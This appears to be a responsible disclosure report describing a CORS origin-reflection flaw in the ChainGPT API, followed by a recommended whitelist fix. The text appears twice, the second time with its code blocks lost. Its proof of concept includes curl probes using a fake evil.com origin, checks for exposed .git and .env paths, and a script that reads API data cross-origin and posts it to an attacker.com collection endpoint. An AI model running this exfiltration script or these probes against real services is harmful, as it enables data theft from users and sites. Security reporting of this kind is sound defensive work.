π Responsible Security Disclosure
Severity: Medium (CVSS 5.3)
Affected Component: api.chaingpt.org β All API endpoints
Summary
The ChainGPT API (api.chaingpt.org) reflects any origin in the Access-Control-Allow-Origin header without validation. This allows any website to make cross-origin requests and read API responses, breaking the browser's same-origin policy.
Affected Endpoints
https://api.chaingpt.org/ (root)https://api.chaingpt.org/newshttps://api.chaingpt.org/chat/chatHistoryhttps://api.chaingpt.org/nft/abihttps://api.chaingpt.org/nft/get-chains
Proof of Concept
# Test CORS reflection
curl -sI https://api.chaingpt.org/ -H "Origin: https://evil.com" | grep access-control-allow-origin
# Result:
# access-control-allow-origin: https://evil.com
# Test multiple origins β ALL are reflected:
# https://evil.com β reflected β
# https://attacker.com β reflected β
# http://localhost β reflected β
# https://google.com β reflected β
JavaScript PoC (save as exploit.html on any domain):
<script>
fetch('https://api.chaingpt.org/news')
.then(r => r.json())
.then(data => {
// Data is readable cross-origin!
console.log(data);
// Exfiltrate to attacker server
fetch('https://attacker.com/collect', {
method: 'POST',
body: JSON.stringify(data)
});
});
</script>Impact
| Impact |
Description |
| π Data Theft |
Read API responses from any origin |
| π Session Abuse |
Potential cookie theft if credentials enabled |
| β‘ API Abuse |
Bypass rate limits via distributed origins |
Additional Findings
1. CORS Wildcard on app.chaingpt.org (Low)
curl -sI https://app.chaingpt.org/staking -H "Origin: https://evil.com" | grep access-control
# access-control-allow-origin: *
2. Protected Sensitive Paths (Info)
curl -sI https://www.chaingpt.org/.git | head -1
# HTTP/2 403
curl -sI https://www.chaingpt.org/.env | head -1
# HTTP/2 403
Recommended Fix
Implement an origin whitelist:
const cors = require('cors');
const allowedOrigins = [
'https://www.chaingpt.org',
'https://app.chaingpt.org',
'https://staking.chaingpt.org'
];
app.use(cors({
origin: function(origin, callback) {
if (!origin || allowedOrigins.includes(origin)) {
callback(null, true);
} else {
callback(new Error('Not allowed by CORS'));
}
},
credentials: false
}));Disclosure
I am reporting this finding in good faith under responsible disclosure principles. I have not exploited this vulnerability beyond verification, have not accessed any user data, and have not caused any damage to your systems.
Contact:
I kindly request:
- Acknowledgment of receipt within 7 days
- A timeline for remediation
- Bug bounty reward (if applicable)
A detailed HTML report with full technical analysis is available upon request.
β Khasbi Maulana
π Responsible Security Disclosure
Severity: Medium (CVSS 5.3)
Affected Component:
api.chaingpt.orgβ All API endpointsSummary
The ChainGPT API (
api.chaingpt.org) reflects any origin in theAccess-Control-Allow-Originheader without validation. This allows any website to make cross-origin requests and read API responses, breaking the browser's same-origin policy.Affected Endpoints
https://api.chaingpt.org/(root)https://api.chaingpt.org/newshttps://api.chaingpt.org/chat/chatHistoryhttps://api.chaingpt.org/nft/abihttps://api.chaingpt.org/nft/get-chainsProof of Concept
JavaScript PoC (save as
exploit.htmlon any domain):Impact
Additional Findings
1. CORS Wildcard on
app.chaingpt.org(Low)2. Protected Sensitive Paths (Info)
Recommended Fix
Implement an origin whitelist:
Disclosure
I am reporting this finding in good faith under responsible disclosure principles. I have not exploited this vulnerability beyond verification, have not accessed any user data, and have not caused any damage to your systems.
Contact:
I kindly request:
A detailed HTML report with full technical analysis is available upon request.
β Khasbi Maulana